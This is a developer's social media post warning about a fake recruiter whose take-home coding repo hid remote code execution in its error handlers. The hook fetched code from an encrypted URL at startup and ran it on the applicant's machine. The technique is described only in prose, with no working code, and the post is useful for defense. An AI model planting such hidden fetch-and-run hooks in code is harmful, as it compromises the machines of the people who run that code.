SE with 8 yrs under my keyboard - been on the hunt for a new salary position (currently freelance), and I just had my first interesting scam attempt 👏🏽 I assume most people on the web are sus until proven otherwise. I wish I didnt; however, it's my default at this point - and it saved my ass once again 😮‍💨 Had a recruiter reach out about a position - profile looked normal-ish, company looked normal-ish, nothing immediate stood out, comms were leaning AI but not beyond the normal level of human laziness in 2026 and no obvious typos, etc. Was given a take home assignment: a small, well-structured, repo with a few tasks. They say to do any of the tasks but point you to a specific one - and then one of them specifically tells you too look for, fix, and write tests for bugs (min of 5), so you expect to have errors out of the gate. What's the first thing you'd normally do a few years ago? Read the README, follow the instructions, run the app, do the tasks, fix the bugs. If you did that here, despite nothing immediately suspicious, you'd have been compromised 🥲 Given just how shady things can be on the web and having seen more rugs and scam attempts than anyone outside of the web3 trenches could imagine, I set a pre-step for myself and ran a full codebase analysis (yall know I hate AI, but it's useful when guided with a steady hand). I included very clear instructions/configs to execute nothing - run no dev servers, call no endpoints, and strictly walk through the code helping me search for holes, weird patterns, compromises, and various attack vectors. Just a sanity check before I dug in - thought I'd find nothing. Instead, I found a very interesting injection point in the pre-built error handlers that would actually run an API call at the beginning of every app execution -> call an encrypted url (hidden in a hardcoded string) and return arbitrary and executable code on the server that called it (i.e. the applicants machine). Now, despite being mildly terrifying, this could have still been part of that QA assignment and something they "expected" you to find/fix... but that was a little too sus for me. Fast forward to more [dev] paranoia-induced research, and I found: mismatching company addrs, fake testimonials, a dead guy being impersonated (bruh), and [thankfully] 2 small posts calling out similar circumstances with the same company. Reported my findings (respectively) to the "recruiter" and asked if they could provide clarity on anything - instantly stopped our message session and deleted the account lol scam confirmed. An important lesson, my fellow devs (especially those of you that are newer)... NEVER blindly run code unless you know where it came from... and even then, dont trust - verify ⌨️🙏🏼⌨️

P.S. This post was powered by coffee and a sigh ✌🏽 not AI